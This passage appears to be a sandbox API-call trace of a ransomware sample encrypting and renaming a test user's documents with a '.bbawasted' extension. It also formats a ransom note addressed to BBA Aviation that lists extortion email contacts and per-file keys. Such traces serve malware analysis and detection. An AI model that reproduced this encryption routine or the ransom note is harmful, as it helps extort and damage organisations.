returned 55 [0214.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x278) returned 0x6c4b88 [0214.163] lstrcpyW (in: lpString1=0x6c4bf6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0214.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0214.163] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0214.163] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0214.163] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0214.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Ihh5mnxu_Eje34 R8Df5.xlsx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ihh5mnxu_eje34 r8df5.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0214.168] WriteFile (in: hFile=0x290, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0214.169] SetEndOfFile (hFile=0x290) returned 1 [0214.169] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0214.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0214.169] lstrcpyW (in: lpString1=0x6c4bf6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0214.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Ihh5mnxu_Eje34 R8Df5.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\ihh5mnxu_eje34 r8df5.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Ihh5mnxu_Eje34 R8Df5.xlsx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ihh5mnxu_eje34 r8df5.xlsx.bbawasted")) returned 1 [0214.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Ihh5mnxu_Eje34 R8Df5.xlsx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ihh5mnxu_eje34 r8df5.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0214.170] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0214.171] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x785c [0214.171] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x785c) returned 0x5f0000 [0214.171] CloseHandle (hObject=0x288) returned 1 [0214.181] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0214.181] CloseHandle (hObject=0x27c) returned 1 [0214.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0214.182] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6570) returned 1 [0214.182] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0214.182] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0214.182] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a64e8) returned 1 [0214.183] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0214.183] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0214.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0214.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0214.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0214.192] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]XU0nPTALhpuCtr+s+Mtpqgfim4rNYumGtJW4xeGJArYnYQ1XaM6yzNbFhrHdC8au\r\nNsayTubt2xM8amID+9XrtHpY/wGv4CxuM6yCaVbh3ljQpBEjQyFTGObz5bn2Br2M\r\njMofRvXrBPAj5pS6X5++fIQj7kg8G3DhRhNd1mYU7FM81ZWXjgOC124sPD37v2F4\r\nIRE8v0vjyhyRgljE0IJdnMUTe6cWKSfTfBqsvlaNoJClDuqYJcNpGOcQNA/lcHui\r\nNgSqYVSJXhYSYOxy6ejlUpMq5ipIQFRDvzVXbH54B1iUMgqEQnFCRTSczukqBivM\r\nGzcxTkg+XCRqddK70cQeECtEaf+GPs/gFkRM3ibjdlTejJvWzC8aBk0kKSJZZFoe\r\nz3jKIie/OtvO7iFX0Ru9gMPuSUovR01kf8+x2PiBpV3m/8jdBW5CLPricfVLcdZO\r\nI5VHA0dt/hlupptMf7s5Ls1JTt0OOv8EujIieS9zwpdf09U/vIK0qBE+CM7hjVmk\r\nqigzjwa9seZs989TYi71ytaPo6NsY3rRfBoKpXOnffxltQu+y5gPDGVCxH9H4Ea/\r\nAXkOqK7px1xacZgCxhQQc9+GOReL6di3kaNpKoPRF6OocHhpPR8QypSRyu1lpSx9\r\nWoaFbof8ArHFFTTaqGSRMMJhsbxpt3KfOROR20llFhV=[end_key]\r\nKEEP IT\r\n") returned 984 [0214.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0214.192] WriteFile (in: hFile=0x290, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0214.193] SetEndOfFile (hFile=0x290) returned 1 [0214.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0214.195] CloseHandle (hObject=0x290) returned 1 [0214.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0214.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b04c0 | out: hHeap=0x660000) returned 1 [0214.197] _aulldvrm () returned 0x0 [0214.197] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0214.197] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0214.197] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0214.197] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mLJcyJdURZqaA_atJ.pptx") returned 52 [0214.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6c4b88 [0214.198] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0214.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0214.198] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6020) returned 1 [0214.198] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0214.198] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0214.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mLJcyJdURZqaA_atJ.pptx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\mljcyjdurzqaa_atj.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0214.725] WriteFile (in: hFile=0x290, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0214.726] SetEndOfFile (hFile=0x290) returned 1 [0214.726] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0214.726] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0214.726] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0214.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mLJcyJdURZqaA_atJ.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mljcyjdurzqaa_atj.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mLJcyJdURZqaA_atJ.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\mljcyjdurzqaa_atj.pptx.bbawasted")) returned 1 [0214.728] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\mLJcyJdURZqaA_atJ.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\mljcyjdurzqaa_atj.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0214.728] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0214.728] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x768e [0214.728] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x768e) returned 0x5f0000 [0214.728] CloseHandle (hObject=0x27c) returned 1 [0214.746] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0214.746] CloseHandle (hObject=0x288) returned 1 [0214.747] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0214.747] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a63d8) returned 1 [0214.747] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0214.748] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0214.748] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6708) returned 1 [0214.748] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0214.748] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0215.302] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0215.302] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0215.303] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0215.303] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]cWCcjliX0FQV1BxGh9leJ8dx0AlYFk5E4g2aP6ZGqnHzq+8yAlazCA/XjFHM5u/n\r\nVJ4p5wYerVCnBzqBUUQivFUBX6gsvm26A2DCp1dZBDG1YOlc7x6MhoCtL7wwbj4X\r\nU1rVFubBhVpuia4xn//OuEJpbwUJAbQRySfcOkSqdUvlViM/XoU6Oo/u5VlgasNh\r\nDZvlqqn33Y4Y1REfnfec9FcF+4IHS1hqIw9OAezcneCS2haVOFAoF3+o7UzW7N+O\r\ni8SwhHk3VsOh1F21Tku7rZiquKmfw43aY5Uk1/rvMrzs1sqA0Jq7vjsG1sCg0QY0\r\n1aYhQty8OQ6CFQopq9fSZ94g1Jwyz/N1nAcpdcY6K4U1707ja6zbpgiaIAoaHFdL\r\nNnYIbQHYOgVgXKW/SxKps8ab7zA1IyTn2GRWY7XiHkkKtp+1Vq1o8Pdfdagadc0n\r\naQuFZ19EzfGzAeU5CrV717tJzq/6Q8eHtFHI+G2PJgwwWcbhHenjwCcq0ch+Hsob\r\ntVk7zFqt6r+FNof/a/bax3i8EsCfExZrt1ZmCBzl/2OTjPslT8MawkIINmFtp1cY\r\nxjel8h0jP+sZCLHjgu2H77ochXOhGC1AxweNO0dSfNhMEJfc5i931Mw2yNcYwu+J\r\nEpYKqJARfyPsp/Io1j5SHjEQ3tWxQsqyzw2sdQyhuju=[end_key]\r\nKEEP IT\r\n") returned 984 [0215.303] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0215.303] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0215.303] SetEndOfFile (hFile=0x290) returned 1 [0215.305] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0215.305] CloseHandle (hObject=0x290) returned 1 [0215.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0215.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0fb0 | out: hHeap=0x660000) returned 1 [0215.307] _aulldvrm () returned 0x0 [0215.307] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0215.308] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0215.308] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0215.308] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst") returned 60 [0215.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6c4b88 [0215.308] lstrcpyW (in: lpString1=0x6c4c00, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0215.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0215.308] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6570) returned 1 [0215.308] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0215.308] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0215.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0215.309] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0215.310] SetEndOfFile (hFile=0x290) returned 1 [0215.310] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0215.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0215.311] lstrcpyW (in: lpString1=0x6c4c00, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0215.311] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst.bbawasted")) returned 1 [0215.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0215.312] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0215.312] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x42400 [0215.312] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x42400) returned 0x1480000 [0215.312] CloseHandle (hObject=0x294) returned 1 [0215.339] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0215.340] CloseHandle (hObject=0x280) returned 1 [0215.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0215.341] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6680) returned 1 [0215.341] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0215.341] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0215.341] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5f98) returned 1 [0215.342] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0215.342] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0215.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0215.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0215.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0215.777] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HN18SnogpM0k0st8bZJZsE8h2I0+8wHqHGtaaRL1EPCF8gT3sG8fM3GTvJ4yKPmc\r\nxfVTEGrT/9X2D1FEK1co6Ed/Nft9VRtA19WHJbUBLK46d+os7b/MI0ntpmywW/KU\r\nC7RLv0/wwgtWuBCsmWXVuIk7d+XELLKyCUggJKxWqydY1MQZAHGloKQfb5v9Q11R\r\nyJkL+hh1y3DjxEABOb77VN8Izq+9E4Y1k2Gv07LqvnmtRuWzI/04AQcVEYaOp0Qb\r\nmJxSYFIWAHgA4EKjXdF6EZ7A5lv+XinQnqdyWpIuTKFmLcYMWuEY7gXvek/q8EFn\r\n8u4+IBAyAcPT18pTQjuny+4lrJ6U0RrqCiMVBm8paztp0tPUmr8tgcqum4ESaXCR\r\nWBvcxD3PILpN4lDeITUZrYDcky2nXOuhLq+znXNgYgZqTRAKFdebvYqiPCTu4laR\r\nyo72Kbmpbbk2cRlYHw4fcqTv9CEbkeNkfPulSI7syRCloeXwsHxf8rE7U7O+vSYv\r\nITJ1bVYze5TTNekS/E9+9Ic/z7MVDJvuGqDQQL/SK3vQKMmHNOzYKzp5RmYYtf7g\r\niPeqsa0DgIjwbG7RUd2RY0oyM2LYTXxKVIdTS6nKwqljHugGgXIs/u1JKf7G4p84\r\nvqOHoB469wPaWKMvMN2zHRM84hudrDbMCe8P8qm8aMW=[end_key]\r\nKEEP IT\r\n") returned 984 [0215.777] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0215.777] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0215.777] SetEndOfFile (hFile=0x290) returned 1 [0215.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0215.779] CloseHandle (hObject=0x290) returned 1 [0215.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0215.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a85c0 | out: hHeap=0x660000) returned 1 [0215.784] _aulldvrm () returned 0x0 [0215.784] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6460) returned 1 [0215.785] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0215.785] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0215.785] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\8Br7zFnysp5NoirG.doc") returned 55 [0215.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x278) returned 0x6c4b88 [0215.786] lstrcpyW (in: lpString1=0x6c4bf6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0215.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0215.786] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a63d8) returned 1 [0215.786] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0215.786] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0215.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\8Br7zFnysp5NoirG.doc.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\8br7zfnysp5noirg.doc.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0215.787] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0215.788] SetEndOfFile (hFile=0x290) returned 1 [0215.789] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0215.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0215.789] lstrcpyW (in: lpString1=0x6c4bf6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0215.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\8Br7zFnysp5NoirG.doc" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\8br7zfnysp5noirg.doc"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\8Br7zFnysp5NoirG.doc.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\8br7zfnysp5noirg.doc.bbawasted")) returned 1 [0215.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\8Br7zFnysp5NoirG.doc.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\8br7zfnysp5noirg.doc.bbawasted"), 